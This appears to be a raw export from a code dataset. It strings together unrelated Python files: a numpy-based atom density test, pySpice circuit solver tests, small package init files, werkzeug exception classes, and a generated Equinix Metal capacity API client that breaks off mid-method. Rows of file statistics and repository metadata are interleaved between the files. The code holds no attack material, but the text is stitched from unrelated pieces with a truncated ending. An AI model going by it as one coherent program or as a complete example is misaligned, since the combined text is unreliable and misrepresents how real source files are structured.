np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0]]]
))
def test_atoms_to_rdensity_non_orthogonal():
atoms = ase_bulk("Fe")
atom_map = {"Fe": {"radius": 1.3, "color_fill": "red"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [-1.435, 1.435, 1.435],
'b': [1.435, -1.435, 1.435],
'c': [1.435, 1.435, -1.435]}
assert dstruct["elements"][0]["centre"] == [0.7175, 0.7175, 0.7175]
nan = np.nan
np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[1.0, 1.0, nan, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[nan, 1.0, 1.0, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]]]
))
| 40.230769
| 120
| 0.468834
| 3,102
| 18,305
| 2.6902
| 0.061896
| 0.359497
| 0.469143
| 0.589575
| 0.845656
| 0.818454
| 0.793289
| 0.782624
| 0.759976
| 0.749311
| 0
| 0.137142
| 0.288555
| 18,305
| 454
| 121
| 40.319383
| 0.503647
| 0.039115
| 0
| 0.770667
| 0
| 0
| 0.041676
| 0.001596
| 0
| 0
| 0
| 0
| 0.12
| 1
| 0.048
| false
| 0
| 0.026667
| 0.002667
| 0.082667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
bd7b8d410d6c50fb125b678ee72ceb44dc51cdae
| 3,102
|
py
|
Python
|
test/solver_component_test.py
|
SleepBook/pySpice
|
b1a468820379ce8aeaff91ddfa0113a0accb07f3
|
[
"MIT"
] | 5
|
2016-10-17T02:11:45.000Z
|
2020-02-28T20:22:08.000Z
|
test/solver_component_test.py
|
SleepBook/pySpice
|
b1a468820379ce8aeaff91ddfa0113a0accb07f3
|
[
"MIT"
] | null | null | null |
test/solver_component_test.py
|
SleepBook/pySpice
|
b1a468820379ce8aeaff91ddfa0113a0accb07f3
|
[
"MIT"
] | null | null | null |
from nose.tools import *
from pySpice.solver.stamp import *
from pySpice.parser.parser import *
import pySpice.global_data
import numpy as np
def test_stamp_resistor():
reload(pySpice.global_data)
NETLIST_ROOT = 'data/sample_netlist/'
parser(NETLIST_ROOT + 'stamp1.sp')
MNA = np.zeros((pySpice.global_data.MNA_dim, pySpice.global_data.MNA_dim))
RHS = np.zeros((pySpice.global_data.MNA_dim,))
sweep_flag, sweep_list, converge_flag, converge_list = stamp('dc', pySpice.global_data.ANALYSIS_LIST[0], MNA, RHS)
assert_equal(sweep_flag, 1)
assert_equal(sweep_list[0].switch, 'gen')
assert_equal(sweep_list[0].coord, [((3,),1)])
#assert_equal(RHS,[])
#assert_equal(MNA,[])
assert_equal(converge_flag, 0)
def test_stamp_xcxs():
reload(pySpice.global_data)
NETLIST_ROOT = 'data/sample_netlist/'
parser(NETLIST_ROOT + 'stamp2.sp')
MNA = np.zeros((pySpice.global_data.MNA_dim, pySpice.global_data.MNA_dim))
RHS = np.zeros((pySpice.global_data.MNA_dim,))
sweep_flag, sweep_list, converge_flag, converge_list = stamp('dc', pySpice.global_data.ANALYSIS_LIST[0], MNA, RHS)
assert_equal(sweep_flag, 1)
assert_equal(sweep_list[0].switch, 'gen')
assert_equal(sweep_list[0].coord, [((3,),1)])
assert_equal(pySpice.global_data.NODE_TRANSLATION,{'1': 1, '0': 0, '2': 2, 'vin': 3, 'e1': 4})
#assert_equal(MNA, [])
#assert_equal(RHS, [])
def test_stamp_active():
reload(pySpice.global_data)
NETLIST_ROOT = 'data/sample_netlist/'
parser(NETLIST_ROOT + 'stamp3.sp')
MNA = np.zeros((pySpice.global_data.MNA_dim, pySpice.global_data.MNA_dim), dtype=np.complex)
RHS = np.zeros((pySpice.global_data.MNA_dim,), dtype=np.complex)
sweep_flag, sweep_list, converge_flag, converge_list = stamp('ac', pySpice.global_data.ANALYSIS_LIST[0], MNA, RHS)
assert_equal(sweep_flag, 1)
assert_equal(sweep_list[0].switch, 'gen')
#assert_equal(sweep_list[0].coord, [])
assert_equal(sweep_list[1].switch, 'gen')
#assert_equal(sweep_list[1].coord,[])
MNA = np.zeros((pySpice.global_data.MNA_dim, pySpice.global_data.MNA_dim))
RHS = np.zeros((pySpice.global_data.MNA_dim,))
sweep_flag, sweep_list, converge_flag, converge_list = stamp('tran', pySpice.global_data.ANALYSIS_LIST[1], MNA, RHS)
assert_equal(sweep_flag, 1)
assert_equal(pySpice.global_data.NODE_TRANSLATION, {'1': 1, '0': 0, '2': 2, 'vin': 3, 'l1': 4})
assert_equal(len(sweep_list), 3)
assert_equal(sweep_list[0].switch, 'upd')
#assert_equal(sweep_list[0].coord, [])
assert_equal(sweep_list[2].switch, 'upd')
#assert_equal(sweep_list[2].coord,[])
assert_equal(sweep_list[1].switch,'gen')
assert_equal(sweep_list[1].coord, [((3,),1)])
if __name__ == '__main__':
reload(pySpice.global_data)
NETLIST_ROOT = 'data/sample_netlist/'
parser(NETLIST_ROOT + 'stamp3.sp')
MNA = np.zeros((pySpice.global_data.MNA_dim, pySpice.global_data.MNA_dim), dtype=np.complex)
RHS = np.zeros((pySpice.global_data.MNA_dim,), dtype=np.complex)
sweep_flag, sweep_list, converge_flag, converge_list = stamp('ac', pySpice.global_data.ANALYSIS_LIST[0], MNA, RHS)
| 38.296296
| 118
| 0.725016
| 474
| 3,102
| 4.447257
| 0.126582
| 0.166509
| 0.217742
| 0.142315
| 0.883302
| 0.844877
| 0.816888
| 0.816888
| 0.816888
| 0.804554
| 0
| 0.019308
| 0.115087
| 3,102
| 80
| 119
| 38.775
| 0.748634
| 0.073501
| 0
| 0.648148
| 0
| 0
| 0.062096
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.055556
| false
| 0
| 0.092593
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5040218d946bd517ddfa949bb12db23c00e55a3
| 118
|
py
|
Python
|
utils/__init__.py
|
hentt30/EDA-titanic-dataset
|
3213a03b4c0e6569732e19a977be64cf9893def5
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
hentt30/EDA-titanic-dataset
|
3213a03b4c0e6569732e19a977be64cf9893def5
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
hentt30/EDA-titanic-dataset
|
3213a03b4c0e6569732e19a977be64cf9893def5
|
[
"MIT"
] | null | null | null |
"""
init for utils module
"""
from .trimmed import trimmed_mean
from .trimmed import trimmed_std
from .mad import mad
| 16.857143
| 33
| 0.771186
| 18
| 118
| 4.944444
| 0.555556
| 0.247191
| 0.382022
| 0.539326
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152542
| 118
| 6
| 34
| 19.666667
| 0.89
| 0.177966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e5120ba18b24994ad061d3c275aeb01172b7a577
| 143
|
py
|
Python
|
vicarui/src/vicarui/analysis/fitting/__init__.py
|
joniumGit/moons
|
f5f8b7e23e707c8cf7e1081c4a1c0fcc22182d85
|
[
"MIT"
] | 1
|
2021-07-16T06:30:37.000Z
|
2021-07-16T06:30:37.000Z
|
vicarui/src/vicarui/analysis/fitting/__init__.py
|
joniumGit/moons
|
f5f8b7e23e707c8cf7e1081c4a1c0fcc22182d85
|
[
"MIT"
] | null | null | null |
vicarui/src/vicarui/analysis/fitting/__init__.py
|
joniumGit/moons
|
f5f8b7e23e707c8cf7e1081c4a1c0fcc22182d85
|
[
"MIT"
] | 1
|
2021-05-26T03:53:41.000Z
|
2021-05-26T03:53:41.000Z
|
from .fitting import DataPacket
from .second_degree import contrast_2nd_deg, integrate_2nd_deg, contrast_error_2nd_deg, integral_error_2nd_deg
| 47.666667
| 110
| 0.888112
| 22
| 143
| 5.272727
| 0.545455
| 0.206897
| 0.189655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.076923
| 143
| 2
| 111
| 71.5
| 0.848485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e557d9d613fc2b7c3de5673478003bd99319e90d
| 379
|
py
|
Python
|
1cac.py
|
Roseliannys17/grupo8_2167
|
19703972ac59f40b6bb4d5c0a7528119e8d94a2d
|
[
"MIT"
] | null | null | null |
1cac.py
|
Roseliannys17/grupo8_2167
|
19703972ac59f40b6bb4d5c0a7528119e8d94a2d
|
[
"MIT"
] | null | null | null |
1cac.py
|
Roseliannys17/grupo8_2167
|
19703972ac59f40b6bb4d5c0a7528119e8d94a2d
|
[
"MIT"
] | 1
|
2021-11-22T03:39:57.000Z
|
2021-11-22T03:39:57.000Z
|
# Given a string, write a function that changes all the spaces to hyphens.
string='Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO'
mi_string = string.replace(' ', '-')
print(mi_string)
| 75.8
| 240
| 0.781003
| 63
| 379
| 4.666667
| 0.285714
| 0.642857
| 0.884354
| 1.22449
| 0.642857
| 0.642857
| 0.642857
| 0.642857
| 0.642857
| 0.642857
| 0
| 0
| 0.171504
| 379
| 4
| 241
| 94.75
| 0.936306
| 0.208443
| 0
| 0
| 0
| 0.333333
| 0.786441
| 0
| 0
| 0
| 0
| 0.25
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e5917ad441193d527d099caa73575710536653e3
| 79
|
py
|
Python
|
qleet/simulators/__init__.py
|
AnimeshSinha1309/qaoa-optimizer
|
2a93a46bacc99f22f49e7b5121eb3aa9f12c0163
|
[
"Apache-2.0"
] | 9
|
2021-09-26T18:43:43.000Z
|
2022-03-30T12:34:01.000Z
|
qleet/simulators/__init__.py
|
QLemma/qLEET
|
2a93a46bacc99f22f49e7b5121eb3aa9f12c0163
|
[
"Apache-2.0"
] | 12
|
2021-09-19T13:29:33.000Z
|
2022-01-09T15:22:49.000Z
|
qleet/simulators/__init__.py
|
QLemma/qLEET
|
2a93a46bacc99f22f49e7b5121eb3aa9f12c0163
|
[
"Apache-2.0"
] | 1
|
2022-03-14T03:02:24.000Z
|
2022-03-14T03:02:24.000Z
|
import qleet.simulators.pqc_trainer
import qleet.simulators.circuit_simulators
| 26.333333
| 42
| 0.898734
| 10
| 79
| 6.9
| 0.6
| 0.318841
| 0.608696
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050633
| 79
| 2
| 43
| 39.5
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e5a6db18be790ecc1a424104eb91698be76ddabf
| 166
|
py
|
Python
|
Core/Exceptions/Search.py
|
hanif-ali/BlogBar
|
e24aa0835ac8869680bd904ad050fd7437ed97c7
|
[
"PostgreSQL"
] | null | null | null |
Core/Exceptions/Search.py
|
hanif-ali/BlogBar
|
e24aa0835ac8869680bd904ad050fd7437ed97c7
|
[
"PostgreSQL"
] | null | null | null |
Core/Exceptions/Search.py
|
hanif-ali/BlogBar
|
e24aa0835ac8869680bd904ad050fd7437ed97c7
|
[
"PostgreSQL"
] | 1
|
2020-10-25T18:11:22.000Z
|
2020-10-25T18:11:22.000Z
|
from werkzeug.exceptions import BadRequestKeyError
class InvalidGETRequest(BadRequestKeyError):
pass
class CampaignDoesNotExist(BadRequestKeyError):
pass
| 16.6
| 50
| 0.825301
| 13
| 166
| 10.538462
| 0.692308
| 0.321168
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13253
| 166
| 9
| 51
| 18.444444
| 0.951389
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
e5c5d1c82c3889cd36c60debee773af97134d527
| 89
|
py
|
Python
|
pypy/module/test_lib_pypy/pyrepl/__init__.py
|
akercheval/espy
|
f8317d2f01ba726ed4f03cab081176c32ae4cac4
|
[
"Apache-2.0",
"OpenSSL"
] | 4
|
2019-02-11T06:58:43.000Z
|
2020-03-15T14:12:32.000Z
|
pypy/module/test_lib_pypy/pyrepl/__init__.py
|
akercheval/espy
|
f8317d2f01ba726ed4f03cab081176c32ae4cac4
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
pypy/module/test_lib_pypy/pyrepl/__init__.py
|
akercheval/espy
|
f8317d2f01ba726ed4f03cab081176c32ae4cac4
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
import sys
import lib_pypy.pyrepl
sys.modules['pyrepl'] = sys.modules['lib_pypy.pyrepl']
| 22.25
| 54
| 0.775281
| 14
| 89
| 4.785714
| 0.428571
| 0.208955
| 0.38806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078652
| 89
| 3
| 55
| 29.666667
| 0.817073
| 0
| 0
| 0
| 0
| 0
| 0.235955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e5c68503425412f81cebe05fe31512438af3d279
| 36,215
|
py
|
Python
|
metal/models/capacity_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | null | null | null |
metal/models/capacity_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | 3
|
2021-09-27T05:10:36.000Z
|
2021-09-27T06:10:57.000Z
|
metal/models/capacity_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Metal API
This is the API for Equinix Metal. The API allows you to programmatically interact with all of your Equinix Metal resources, including devices, networks, addresses, organizations, projects, and your user account. The official API docs are hosted at <https://metal.equinix.com/developers/api>. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: support@equinixmetal.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from metal.api_client import ApiClient
from metal.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class CapacityApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def check_capacity_for_facility(self, facility, **kwargs): # noqa: E501
"""Check capacity # noqa: E501
Validates if a deploy can be fulfilled. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_capacity_for_facility(facility, async_req=True)
>>> result = thread.get()
:param facility: Facility to check capacity in (required)
:type facility: CapacityInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: CapacityCheckPerFacilityList
"""
kwargs['_return_http_data_only'] = True
return self.check_capacity_for_facility_with_http_info(facility, **kwargs) # noqa: E501
def check_capacity_for_facility_with_http_info(self, facility, **kwargs): # noqa: E501
"""Check capacity # noqa: E501
Validates if a deploy can be fulfilled. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_capacity_for_facility_with_http_info(facility, async_req=True)
>>> result = thread.get()
:param facility: Facility to check capacity in (required)
:type facility: CapacityInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(CapacityCheckPerFacilityList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'facility'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method check_capacity_for_facility" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'facility' is set
if self.api_client.client_side_validation and ('facility' not in local_var_params or # noqa: E501
local_var_params['facility'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `facility` when calling `check_capacity_for_facility`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'facility' in local_var_params:
body_params = local_var_params['facility']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "CapacityCheckPerFacilityList",
401: "Error",
422: "Error",
}
return self.api_client.call_api(
'/capacity', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def check_capacity_for_metro(self, servers, **kwargs): # noqa: E501
"""Check capacity for a metro # noqa: E501
Validates if a deploy can be fulfilled in a metro. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_capacity_for_metro(servers, async_req=True)
>>> result = thread.get()
:param servers: Metro to check capacity in (required)
:type servers: CapacityPerMetroInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: CapacityCheckPerMetroList
"""
kwargs['_return_http_data_only'] = True
return self.check_capacity_for_metro_with_http_info(servers, **kwargs) # noqa: E501
def check_capacity_for_metro_with_http_info(self, servers, **kwargs): # noqa: E501
"""Check capacity for a metro # noqa: E501
Validates if a deploy can be fulfilled in a metro. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_capacity_for_metro_with_http_info(servers, async_req=True)
>>> result = thread.get()
:param servers: Metro to check capacity in (required)
:type servers: CapacityPerMetroInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(CapacityCheckPerMetroList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'servers'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method check_capacity_for_metro" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'servers' is set
if self.api_client.client_side_validation and ('servers' not in local_var_params or # noqa: E501
local_var_params['servers'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `servers` when calling `check_capacity_for_metro`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'servers' in local_var_params:
body_params = local_var_params['servers']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "CapacityCheckPerMetroList",
401: "Error",
422: "Error",
}
return self.api_client.call_api(
'/capacity/metros', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_capacity_for_facility(self, **kwargs): # noqa: E501
"""View capacity # noqa: E501
Returns a list of facilities and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_capacity_for_facility(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: CapacityList
"""
kwargs['_return_http_data_only'] = True
return self.find_capacity_for_facility_with_http_info(**kwargs) # noqa: E501
def find_capacity_for_facility_with_http_info(self, **kwargs): # noqa: E501
"""View capacity # noqa: E501
Returns a list of facilities and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_capacity_for_facility_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(CapacityList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_capacity_for_facility" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "CapacityList",
401: "Error",
}
return self.api_client.call_api(
'/capacity', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_capacity_for_metro(self, **kwargs): # noqa: E501
"""View capacity for metros # noqa: E501
Returns a list of metros and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_capacity_for_metro(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: MetroCapacityList
"""
kwargs['_return_http_data_only'] = True
